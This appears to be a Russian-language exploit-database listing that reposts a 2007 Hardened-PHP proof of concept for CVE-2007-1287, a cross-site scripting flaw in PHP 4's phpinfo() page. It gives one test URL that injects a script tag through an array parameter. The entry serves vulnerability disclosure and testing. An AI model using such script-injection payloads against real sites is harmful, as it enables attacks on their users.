- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 3405
- Проверка EDB
-
- Пройдено
- Автор
- STEFAN ESSER
- Тип уязвимости
- REMOTE
- Платформа
- MULTIPLE
- CVE
- cve-2007-1287
- Дата публикации
- 2007-03-04
Код:
////////////////////////////////////////////////////////////////////////
// _ _ _ _ ___ _ _ ___ //
// | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ \| || || _ \ //
// | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___|| _/| __ || _/ //
// |_||_|\__,_||_| \__,_|\___||_||_|\___|\__,_| |_| |_||_||_| //
// //
// Proof of concept code from the Hardened-PHP Project //
// (C) Copyright 2007 Stefan Esser //
// //
////////////////////////////////////////////////////////////////////////
// PHP 4 - phpinfo() XSS Testcase //
////////////////////////////////////////////////////////////////////////
To manually test for this vulnerability just call the phpinfo() page with a parameter like this.
http://localhost/phpinfo.php?a[]=<script>alert(/XSS/);</script>
# milw0rm.com [2007-03-04]- Источник
- www.exploit-db.com
